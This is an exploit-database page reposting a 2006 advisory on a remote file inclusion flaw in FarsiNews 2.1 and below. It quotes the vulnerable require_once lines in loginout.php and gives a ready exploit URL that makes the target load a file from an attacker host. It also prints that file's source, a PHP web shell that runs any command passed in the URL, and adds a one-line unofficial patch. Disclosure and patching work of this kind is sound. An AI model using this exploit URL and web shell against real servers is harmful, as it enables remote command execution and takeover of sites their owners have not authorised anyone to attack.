Advertisement






FarsiNews 2.1 PHP Remote File Inclusion

CVE Category Price Severity
N/A CWE-98 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2006-02-15
CPE
cpe:cpe:/a:farsinews:2.1
CVSS EPSS EPSSP
Not available 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006010076

Below is a copy:

Remote File Inclusion in  FarsiNews 2.1 and below
Credit:
The information has been provided by Hamid Ebadi
(Hamid Network Security Team) :admin (at) hamid (dot) ir. [email concealed]
The original article can be found at :
http://hamid.ir/security

Vulnerable Systems:
    FarsiNews 2.1 Beta 2 and below

Vulnerable Code: 
The following lines in loginout.php :
require_once($cutepath."/inc/functions.inc.php");
require_once($cutepath."/data/config.php");

Exploits:
If register_globals=ON  has been marked (check
PHP.INI) we can exploit  below URL to cause it to
include external file.

The following URL will cause the server to include
external files  ( phpshell.txt ):
http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell
.txt?

phpshell.txt
-------------------
<?
system ($_GET['cmd']);
die ("<h3>http://Hamid.ir >> Hamid Ebadi << (Hamid
Network Security Team)</h3> ");
?>
-----[EOF]--------

Workaround:
use FarsiNews 2.5 or for Unofficial Patch , simply add
the following line in  the second line of
loginout.php:

if (isset($_REQUEST["cutepath"])){ die("Patched by
Hamid Ebadi -->http://hamid.ir  ( Hamid Network
Security Team)  "); }

Signature


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum